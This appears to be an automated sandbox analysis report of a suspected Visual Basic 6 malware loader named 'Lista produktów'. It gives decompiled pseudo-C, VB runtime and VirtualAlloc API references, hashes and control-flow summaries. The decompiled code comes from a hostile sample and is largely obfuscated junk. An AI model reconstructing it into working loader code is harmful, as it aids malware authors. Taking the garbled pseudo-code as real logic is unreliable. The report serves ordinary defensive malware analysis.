                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$CheckHresult$Free$New2$Move$Chkstk$ErrorLateListSystem$#536CallCopy$#535#617#703AddrefConstruct2
                  • String ID: (RO$Enervous$Holmberry5$JUVENILT$LYDIA$Receptionsassistenter4$SLAVESJLENE$X$disuniter
                  • API String ID: 2543599168-2988764042
                  • Opcode ID: 84ef98b712c1bb61970680905bcf3bc2b3ce1b077cc75f9bdc71affb8e2a378c
                  • Instruction ID: 6c77439a6440881836e68b9f9d37a3359eac8e5b2e9e6199c05848038b12c06f
                  • Opcode Fuzzy Hash: 84ef98b712c1bb61970680905bcf3bc2b3ce1b077cc75f9bdc71affb8e2a378c
                  • Instruction Fuzzy Hash: 4BB216709016289FEB22DF50CD45BDABBB8BF08705F0050EAE509B62A1DBB85F94DF14
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 75%
                  			E00410546(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
                  				void* _v3;
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				void* _v28;
                  				intOrPtr _v32;
                  				void* _v36;
                  				char _v52;
                  				char* _v60;
                  				void* _v68;
                  				void* _t22;
                  				char* _t24;
                  				void* _t38;
                  				void* _t41;
                  				intOrPtr _t42;
                  
                  				_t42 = _t41 - 0xc;
                  				 *[fs:0x0] = _t42;
                  				L004011F0();
                  				_v16 = _t42;
                  				_v12 = 0x401198;
                  				_v8 = 0;
                  				_t22 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x4011f6, _t38);
                  				L0040136A();
                  				_v60 = L"TINCHILL";
                  				_t23 = _t22 + 1;
                  				asm("ror byte [eax], 0x0");
                  				 *_t23 =  *(_t22 + 1) + _t22 + 1;
                  				L004012CE();
                  				_push(0);
                  				_t24 =  &_v52;
                  				_push(_t24); // executed
                  				L004012D4(); // executed
                  				L004013B2();
                  				L004013A6();
                  				_v32 =  *0x401190;
                  				asm("wait");
                  				_push(0x4105f2);
                  				L00401364();
                  				L00401364();
                  				return _t24;
                  			}

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004011F6), ref: 00410562
                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 0041058C
                  • __vbaVarDup.MSVBVM60 ref: 004105A5
                  • #645.MSVBVM60(?,00000000), ref: 004105B0
                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004105BA
                  • __vbaFreeVar.MSVBVM60(?,00000000), ref: 004105C2
                  • __vbaFreeStr.MSVBVM60(004105F2,?,00000000), ref: 004105E4
                  • __vbaFreeStr.MSVBVM60(004105F2,?,00000000), ref: 004105EC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Free$#645ChkstkCopyMove
                  • String ID: TINCHILL
                  • API String ID: 2239900635-1301385301
                  • Opcode ID: 30e086ac958ae0ac4c1e3400a4321b77ebbd695e6547cc46355ccc177ddcde3b
                  • Instruction ID: 73f56eb3243ecec4c2652903b943d6a510d45a39f948da130470c44d69a4370f
                  • Opcode Fuzzy Hash: 30e086ac958ae0ac4c1e3400a4321b77ebbd695e6547cc46355ccc177ddcde3b
                  • Instruction Fuzzy Hash: 17111870900209ABDB04EF91C886BDEBB78FF04704F40842AF501BB1A1DB786945CB88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  C-Code - Quality: 21%
                  			E00401B8D(intOrPtr* __eax, void* __ebx, void* __ecx) {
                  				void* _t10;
                  				void* _t12;
                  				void* _t24;
                  				void* _t25;
                  
                  				asm("in eax, dx");
                  				asm("in eax, dx");
                  				asm("in eax, dx");
                  				asm("in eax, dx");
                  				asm("in eax, dx");
                  				 *__eax =  *__eax + __eax;
                  				 *__eax =  *__eax + __eax;
                  				 *__eax =  *__eax + __eax;
                  				_t10 = __eax + __ecx + __ecx;
                  				0xe73b0289();
                  				asm("out 0xfa, al");
                  				0xe826038f();
                  				_t11 = _t10 + 1;
                  				_t25 = _t24 + 1;
                  				asm("ror byte [eax], 0x0");
                  				 *_t11 =  *(_t10 + 1) + _t10 + 1;
                  				L004012CE();
                  				_push(0);
                  				_t12 = _t25 - 0x30;
                  				_push(_t12); // executed
                  				L004012D4(); // executed
                  				L004013B2();
                  				L004013A6();
                  				 *((intOrPtr*)(_t25 - 0x1c)) =  *0x401190;
                  				asm("wait");
                  				_push(0x4105f2);
                  				L00401364();
                  				L00401364();
                  				return _t12;
                  			}

                  APIs
                  • __vbaVarDup.MSVBVM60 ref: 004105A5
                  • #645.MSVBVM60(?,00000000), ref: 004105B0
                  • __vbaStrMove.MSVBVM60(?,00000000), ref: 004105BA
                  • __vbaFreeVar.MSVBVM60(?,00000000), ref: 004105C2
                  • __vbaFreeStr.MSVBVM60(004105F2,?,00000000), ref: 004105E4
                  • __vbaFreeStr.MSVBVM60(004105F2,?,00000000), ref: 004105EC
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Free$#645Move
                  • String ID:
                  • API String ID: 3481341938-0
                  • Opcode ID: 2573991e60ae7dc378292da41cd709ca0806f0de5aa67fefd2c848887fcc2e6c
                  • Instruction ID: a96e80991ef884d3133b544aac1d5ec382cac5ea011f1be37a79e5a1b3ef65dc
                  • Opcode Fuzzy Hash: 2573991e60ae7dc378292da41cd709ca0806f0de5aa67fefd2c848887fcc2e6c
                  • Instruction Fuzzy Hash: 65F08130D192899EDB01E7A1DC51AED7B70AF11320F4402ABE062B74F2DE7C188ACB19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 184 4013f0-401419 #100 185 40141a-40144f 184->185 187 401451-401455 185->187 188 4014b2 185->188 187->185 189 401457-4014a9 187->189 190 4014b3 188->190 191 401524 188->191 193 401510-40151a 189->193 194 4014ab-4014b1 189->194 192 401525-401527 190->192 195 4014b4 190->195 191->192 197 401528-401531 192->197 196 40151b-401522 193->196 194->188 194->197 195->196 198 4014b5-4014bc 195->198 196->191 199 401532-40153a 197->199 198->199 202 4014be-4014c9 198->202 202->193
                  C-Code - Quality: 16%
                  			_entry_() {
                  				signed char _t44;
                  				intOrPtr* _t45;
                  				signed int _t46;
                  				signed char _t47;
                  				intOrPtr* _t48;
                  				intOrPtr* _t49;
                  				signed int _t50;
                  				signed int _t51;
                  				signed char _t52;
                  				signed int _t53;
                  				signed int _t57;
                  				void* _t61;
                  				signed int _t63;
                  				void* _t65;
                  				intOrPtr* _t66;
                  				void* _t68;
                  				void* _t71;
                  				signed int _t73;
                  				intOrPtr _t80;
                  
                  				_push("VB5!6&*"); // executed
                  				L004013E8(); // executed
                  				 *_t44 =  *_t44 + _t44;
                  				 *_t44 =  *_t44 + _t44;
                  				 *_t44 =  *_t44 + _t44;
                  				 *_t44 =  *_t44 ^ _t44;
                  				 *_t44 =  *_t44 + _t44;
                  				_t45 = _t44 + 1;
                  				 *_t45 =  *_t45 + _t45;
                  				 *_t45 =  *_t45 + _t45;
                  				 *_t45 =  *_t45 + _t45;
                  				 *((intOrPtr*)(_t63 + _t57 * 2 - 0x47)) =  *((intOrPtr*)(_t63 + _t57 * 2 - 0x47)) + _t57;
                  				asm("aas");
                  				 *(_t53 + 0xb) = _t63;
                  				_t66 = _t65 + 1;
                  				_t46 = 0x8ab5048e;
                  				asm("les ecx, [edx+0x9]");
                  				while(1) {
                  					_t63 = _t63 - 1;
                  					 *_t46 =  *_t46 | _t46;
                  					 *_t46 =  *_t46 + _t46;
                  					 *_t46 =  *_t46 + _t46;
                  					 *_t57 =  *_t57 + _t46;
                  					 *_t46 =  *_t46 + _t46;
                  					 *_t46 =  *_t46 + _t46;
                  					_t47 = _t46 + _t57;
                  					asm("invalid");
                  					_t61 = _t57 +  *((intOrPtr*)(_t71 + 0x4d + _t63 * 2)) - 0xffffffffffffffff;
                  					_t71 = _t71 + 1;
                  					_t68 = _t68 - 1 + 1 - 1;
                  					_push(_t73);
                  					 *_t47 =  *_t47 + _t61;
                  					_t57 = _t61 + 1;
                  					 *_t47 =  *_t47 + _t47;
                  					 *_t47 =  *_t47 + _t47;
                  					_t53 = _t53 + 1 + _t53 + 1;
                  					asm("int3");
                  					 *_t47 =  *_t47 ^ _t47;
                  					_push(es);
                  					asm("into");
                  					asm("sbb bh, [esi]");
                  					_t73 = _t73 |  *(_t47 + 0x56b54785);
                  					if(_t73 != 0) {
                  						break;
                  					}
                  					_t46 = _t47 |  *(_t66 + 0x33);
                  					_push(_t71);
                  					if(_t46 < 0) {
                  						continue;
                  					}
                  					 *((intOrPtr*)(_t68 - 0x6e)) =  *((intOrPtr*)(_t68 - 0x6e)) - _t63;
                  					_t15 = _t66 + _t46 * 2;
                  					 *_t15 = _t63;
                  					_t18 = _t71 - 0x3b91c6c1;
                  					_t63 =  *_t18;
                  					 *_t18 =  *_t15;
                  					_t50 = _t71;
                  					_t51 = _t50;
                  					asm("stosb");
                  					 *((intOrPtr*)(_t51 - 0x2d)) =  *((intOrPtr*)(_t51 - 0x2d)) + _t51;
                  					_t52 = _t53 ^  *(_t57 - 0x48ee309a);
                  					_t53 = _t51;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					 *_t52 =  *_t52 + _t52;
                  					_t47 = _t52 & 0x00000009;
                  					 *_t47 =  *_t47 + _t47;
                  					 *_t66 =  *_t66 + _t47;
                  					_t25 = _t63 + 0x65;
                  					 *_t25 =  *((intOrPtr*)(_t63 + 0x65)) + _t47;
                  					asm("arpl [ebp+0x72], si");
                  					if( *_t25 >= 0) {
                  						L13:
                  						 *_t47 =  *_t47 + _t47;
                  						 *_t47 =  *_t47 + _t47;
                  						 *_t47 =  *_t47 + _t47;
                  						 *_t47 =  *_t47 + _t47;
                  						 *_t47 =  *_t47 + _t47;
                  						L14:
                  						 *_t47 =  *_t47 + _t47;
                  						L15:
                  						 *_t47 =  *_t47;
                  						 *_t47 =  *_t47;
                  						 *((intOrPtr*)(_t47 + 0x800080)) =  *((intOrPtr*)(_t47 + 0x800080)) + _t47;
                  						L16:
                  						 *((intOrPtr*)(_t47 - 0x80000000)) =  *((intOrPtr*)(_t47 - 0x80000000)) + _t47;
                  						L17:
                  						 *_t47 =  *_t47;
                  						L18:
                  						 *((intOrPtr*)(_t47 - 0x7fff8000)) =  *((intOrPtr*)(_t47 - 0x7fff8000)) + _t47;
                  						 *_t47 =  *_t47;
                  						asm("rol al, 0xc0");
                  						L19:
                  						asm("rol al, 0x0");
                  						asm("rcr ah, 0xc0");
                  						_t48 = _t47 + _t63;
                  						asm("retf 0xa6");
                  						asm("int3");
                  						asm("invalid");
                  						 *((intOrPtr*)(_t57 + 0x6600ffff)) =  *((intOrPtr*)(_t57 + 0x6600ffff)) + _t53;
                  						asm("invalid");
                  						 *_t53 =  *_t53 + _t63;
                  						 *_t48 =  *_t48 + 1;
                  						 *_t48 =  *_t48 + 1;
                  						asm("int3");
                  						asm("int3");
                  						 *_t48 =  *_t48 + 1;
                  						asm("cdq");
                  						asm("int3");
                  						 *_t48 =  *_t48 + 1;
                  						asm("o16 int3");
                  						 *_t48 =  *_t48 + 1;
                  						 *_t48 =  *_t48 + 1;
                  						_t49 = _t48 + (_t57 ^ _t73 - 0x00000001);
                  						 *_t49 =  *_t49 + 1;
                  						[far dword [ecx-0x6633ff01]();
                  						 *_t49 =  *_t49 + 1;
                  						asm("cdq");
                  						asm("cdq");
                  						 *_t49 =  *_t49 + 1;
                  						asm("cwd");
                  						 *_t49 =  *_t49 + 1;
                  						 *_t49 =  *_t49 + 1;
                  						goto ( *((intOrPtr*)(_t68 - 1)));
                  					}
                  					 *0x47001201 =  *0x47001201 + _t57;
                  					_t80 =  *0x47001201;
                  					if (_t80 < 0) goto L18;
                  					break;
                  				}
                  				if(_t80 != 0) {
                  					goto L18;
                  				}
                  				if(_t80 < 0) {
                  					goto L16;
                  				}
                  				if(_t80 < 0) {
                  					goto L17;
                  				}
                  				if(_t80 >= 0) {
                  					goto L15;
                  				}
                  				if(_t80 >= 0) {
                  					goto L14;
                  				}
                  				asm("insd");
                  				asm("insd");
                  				asm("gs outsb");
                  				if(_t80 >= 0) {
                  					goto L19;
                  				}
                  				asm("outsb");
                  				_t63 = _t63 + 1;
                  				 *_t63 =  *_t63 + _t47;
                  				 *_t53 =  *_t53 + _t73;
                  				asm("invalid");
                  				 *_t47 =  *_t47 + _t47;
                  				asm("insb");
                  				if ( *_t47 == 0) goto L12;
                  				 *((intOrPtr*)(_t68 + 8)) =  *((intOrPtr*)(_t68 + 8)) + _t53;
                  				 *_t57 =  *_t57 + _t47;
                  				 *_t57 =  *_t57 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 & _t47;
                  				 *_t57 =  *_t57 + _t47;
                  				 *_t47 =  *_t47 + _t57;
                  				 *((intOrPtr*)(_t47 + 0x16000008)) =  *((intOrPtr*)(_t47 + 0x16000008)) + _t57;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t57;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 | _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *((char*)(_t47 + _t47)) =  *((char*)(_t47 + _t47));
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				 *_t57 =  *_t57 + _t47;
                  				 *_t47 =  *_t47 + _t47;
                  				goto L13;
                  			}























                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: #100
                  • String ID: VB5!6&*
                  • API String ID: 1341478452-3593831657
                  • Opcode ID: 605976478f3439c3e8fee535f61cf35f13009986f664e7087156937f1c5b5280
                  • Instruction ID: 9fab2b6fabe600f068c2f63924970bbf018eec735d31a0b40c771a2bf6c28a58
                  • Opcode Fuzzy Hash: 605976478f3439c3e8fee535f61cf35f13009986f664e7087156937f1c5b5280
                  • Instruction Fuzzy Hash: ED41EC6144E7C15FD713877499296917FB0AF93214F0A46EBC0C1CE0F3E66C085AC726
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 274 4072f2-4072f5 275 4072f7 274->275 276 4072cb-4072f0 274->276 277 40730f-4073bc 275->277 276->277 280 4073c2-40744c 277->280 283 407452-4077dd VirtualAlloc 280->283 295 4077e3-407898 call 40791e 283->295 300 40789e-4078f9 295->300 303 4078fc 300->303 303->303
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID:
                  • String ID: ]
                  • API String ID: 0-1813045944
                  • Opcode ID: 026f9062b31725f4c66f7ce4a0c0791d29cda6018883c4b2a0cbbc7fdb149a4e
                  • Instruction ID: 5cb936610358edf67e69ebdada450720991b8b7aa82f53928fa75916d53864f3
                  • Opcode Fuzzy Hash: 026f9062b31725f4c66f7ce4a0c0791d29cda6018883c4b2a0cbbc7fdb149a4e
                  • Instruction Fuzzy Hash: CD71F362F1CB1185FF362128C9E056D6502DB92340F32873BCE1A33DC55B3E1AC6265B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 305 40729b-4073bc 309 4073c2-40744c 305->309 312 407452-4077dd VirtualAlloc 309->312 324 4077e3-407898 call 40791e 312->324 329 40789e-4078f9 324->329 332 4078fc 329->332 332->332
                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: b14317a1b95eb7fb6f98b90cde7b908e5267775d6f79e6cde9a64cc7a6d4b340
                  • Instruction ID: bf29c1fa0c6e9e411c278d4fae329d64b8795db5c212fe72bb17e34f809f6fc5
                  • Opcode Fuzzy Hash: b14317a1b95eb7fb6f98b90cde7b908e5267775d6f79e6cde9a64cc7a6d4b340
                  • Instruction Fuzzy Hash: 90711222F1CB518AFF322168C8E452C6512DF92344F36873BCD6A338C65B3E16C6665B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 333 407343-4073bc 335 4073c2-40744c 333->335 338 407452-4077dd VirtualAlloc 335->338 350 4077e3-407898 call 40791e 338->350 355 40789e-4078f9 350->355 358 4078fc 355->358 358->358
                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: cd606f3dea50bf9def4e8435a9b48599cee8ad992a80da5c0ec11a71d66edc4b
                  • Instruction ID: 11e62355e28bf5b0b5eb84a69bb6a926bd9fe31704dbc57449b658905cdd9b02
                  • Opcode Fuzzy Hash: cd606f3dea50bf9def4e8435a9b48599cee8ad992a80da5c0ec11a71d66edc4b
                  • Instruction Fuzzy Hash: DC615622F1D75189FF362168C9E442C6912DF92344F36867BCE5A32CC6473E1AC6265B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 359 4073e0-4073e5 360 407400-40744c 359->360 362 4073c2-4073de 360->362 363 407452-4077dd VirtualAlloc 360->363 362->360 375 4077e3-407898 call 40791e 363->375 380 40789e-4078f9 375->380 383 4078fc 380->383 383->383
                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 1c464b8f69c8da1a10573afe0e2bed3b1c333b402504d6f4180088321439afa6
                  • Instruction ID: 2a78bffd9da8c5cd6a95bbbd3bc339c4bcd3bb774dd5b2c75ea8e3e25570884b
                  • Opcode Fuzzy Hash: 1c464b8f69c8da1a10573afe0e2bed3b1c333b402504d6f4180088321439afa6
                  • Instruction Fuzzy Hash: 18510362F19B2189FF352168C9E056D6502DBD6345F32873BCD6A33CC4573E1AC2269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 384 40742d-407430 385 40744c 384->385 386 4073c2-40742a 385->386 387 407452-4077dd VirtualAlloc 385->387 386->385 400 4077e3-407898 call 40791e 387->400 405 40789e-4078f9 400->405 408 4078fc 405->408 408->408
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b8a99b25fc36ebd9df1612c21b476e4fa4a7eb669fba86b00a6caf90fc3b11fd
                  • Instruction ID: a360e645ff9bd5e24e0a4946c0fe720855bc71e37bc55657463ebb657b5c4ded
                  • Opcode Fuzzy Hash: b8a99b25fc36ebd9df1612c21b476e4fa4a7eb669fba86b00a6caf90fc3b11fd
                  • Instruction Fuzzy Hash: 13510262F19B1185FF352068C9E056D6402DBD6344F32873BCE6A33CC51B3E2AC6269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 409 4074d9-4077dd VirtualAlloc 421 4077e3-407898 call 40791e 409->421 426 40789e-4078f9 421->426 429 4078fc 426->429 429->429
                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: b22397b0fcf65feab463d9bccd4747f20ddeb3385f6ca212c33f01e1a97c3f1e
                  • Instruction ID: 4fe24c6d73bb709be309c73bf8fdc04b21a3f237e4a2d25d0b51aeb91469d2ba
                  • Opcode Fuzzy Hash: b22397b0fcf65feab463d9bccd4747f20ddeb3385f6ca212c33f01e1a97c3f1e
                  • Instruction Fuzzy Hash: E641D262F19B5189FF352168C9E057D6002DB92345F32873BCE6A33CC51A3E16C6269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 430 407483-4077dd VirtualAlloc 441 4077e3-407898 call 40791e 430->441 446 40789e-4078f9 441->446 449 4078fc 446->449 449->449
                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: e572bebdb34add92f2f4c9be5cbf09df24f40f7c8ed96bccb0f513679d5213f5
                  • Instruction ID: 154b30db0a55406d83b5b8e193aeae642a6a5a3c2202c726383ed4df5e56d3d4
                  • Opcode Fuzzy Hash: e572bebdb34add92f2f4c9be5cbf09df24f40f7c8ed96bccb0f513679d5213f5
                  • Instruction Fuzzy Hash: C1511362F19B5189FF362068C9E046D6402DB92344F33873BCE6A33CC55B3E16C6269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 450 40752a-4077dd VirtualAlloc 460 4077e3-407898 call 40791e 450->460 465 40789e-4078f9 460->465 468 4078fc 465->468 468->468
                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 4f1b998a34c6b5a0a635c7623959a6862db6684b8fe20d6913213713a5b9f8cf
                  • Instruction ID: 96614bbff12802478ec3d2f3d8fcfdd40b4236943381960600768c07c7496fef
                  • Opcode Fuzzy Hash: 4f1b998a34c6b5a0a635c7623959a6862db6684b8fe20d6913213713a5b9f8cf
                  • Instruction Fuzzy Hash: 7641E462F19B1189FF762068CDE457D5402DB92345F33863BCE6A33CC51A3E16C6269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: ac639d5a7f0f5546f6f0157c6f0b1d7803887e482175168b4989e784691b4e2f
                  • Instruction ID: ec914b86d1bb50d9ed2413c39d3d729a4bf9be374acd605a14455209d6e39d1a
                  • Opcode Fuzzy Hash: ac639d5a7f0f5546f6f0157c6f0b1d7803887e482175168b4989e784691b4e2f
                  • Instruction Fuzzy Hash: 9D310562F19B1189FF362078C9E457D6402DB91345F33863BCD6A73CC51A3E1AC6269B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(-0015EB41,00008000,-00000001000243A3,FFE81172), ref: 0040775A
                  Memory Dump Source
